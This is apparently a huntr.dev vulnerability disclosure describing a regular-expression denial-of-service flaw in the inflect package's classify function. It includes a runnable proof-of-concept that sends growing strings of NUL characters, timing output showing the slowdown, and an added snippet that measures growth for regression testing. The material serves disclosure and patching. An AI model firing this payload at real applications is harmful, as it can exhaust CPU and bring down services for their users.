huntr Ready-research 4612B31A-072B-4F61-A916-C7E4CBC2042A
History: Sep 19, 2021 - 10:44 a.m.

Inefficient Regular Expression Complexity in pksunkara/inflect

2021-09-19 10:44:30
ready-research
www.huntr.dev
regular expression
denial of service
cpu consumption
crafted input
node.js
exhausting resources
system crash

EPSS: 0.001
Percentile: 45.7%

✍️ Description

The inflect package is vulnerable to ReDoS (regular expression denial of service). An attacker who is able to provide a crafted table_name as input to the classify function may cause an application to consume an excessive amount of CPU.
The pinned line below uses the vulnerable regex.

🕵️‍♂️ Proof of Concept

Put the code below in a poc.js file and run it with node:

//poc.js
var inflect = require('i')();
for (var i = 1; i <= 500; i++) {
    var time = Date.now();
    // Payload: a run of NUL characters that grows by 10000 each iteration
    var payload = "" + "\u0000".repeat(i * 10000) + "\u0000";
    inflect.classify(payload);
    var time_cost = Date.now() - time;
    console.log("Classify time : " + payload.length + ": " + time_cost + " ms");
}

Check the Output:

Classify time : 10001: 158 ms
Classify time : 20001: 565 ms
Classify time : 30001: 1282 ms
Classify time : 40001: 2129 ms
Classify time : 50001: 3369 ms
Classify time : 60001: 8430 ms
Classify time : 70001: 15926 ms
Classify time : 80001: 16221 ms
--
--
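
As an added illustration (not part of the original report or of the inflect project), the following fits a power law to the timings listed above to quantify how run time grows with input length. The names growthExponent, measure and isSuperLinear and the 1.5 threshold are assumptions of this example; measure can be pointed at a patched classify as a regression check.

```javascript
// Added example: estimate how classify() run time scales with input length.
// PAGE_SAMPLES are the [length, ms] pairs copied from the report's output above.
const PAGE_SAMPLES = [
  [10001, 158], [20001, 565], [30001, 1282], [40001, 2129],
  [50001, 3369], [60001, 8430], [70001, 15926], [80001, 16221],
];

// Least-squares slope of log(time) against log(length): about 1 for a
// linear-time function, about 2 or more for quadratic backtracking.
function growthExponent(samples) {
  const pts = samples
    .filter(([n, ms]) => n > 0 && ms > 0) // log() needs positive values
    .map(([n, ms]) => [Math.log(n), Math.log(ms)]);
  if (pts.length < 2) throw new Error("need at least two non-zero samples");
  const meanX = pts.reduce((s, p) => s + p[0], 0) / pts.length;
  const meanY = pts.reduce((s, p) => s + p[1], 0) / pts.length;
  let sxx = 0, sxy = 0;
  for (const [x, y] of pts) {
    sxx += (x - meanX) ** 2;
    sxy += (x - meanX) * (y - meanY);
  }
  if (sxx === 0) throw new Error("samples must span more than one length");
  return sxy / sxx;
}

// Hypothetical helper: time fn on NUL-filled strings shaped like the PoC
// payload, returning [length, ms] pairs suitable for growthExponent().
function measure(fn, lengths) {
  return lengths.map((n) => {
    const input = "\u0000".repeat(n);
    const start = process.hrtime.bigint();
    fn(input);
    const ms = Number(process.hrtime.bigint() - start) / 1e6;
    return [n, ms];
  });
}

// Assumed threshold: an exponent above 1.5 is treated as super-linear.
function isSuperLinear(samples, threshold = 1.5) {
  return growthExponent(samples) > threshold;
}

console.log("exponent from report timings:", growthExponent(PAGE_SAMPLES).toFixed(2));
```
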

💥 Impact

This vulnerability can exhaust system resources and lead to crashes.
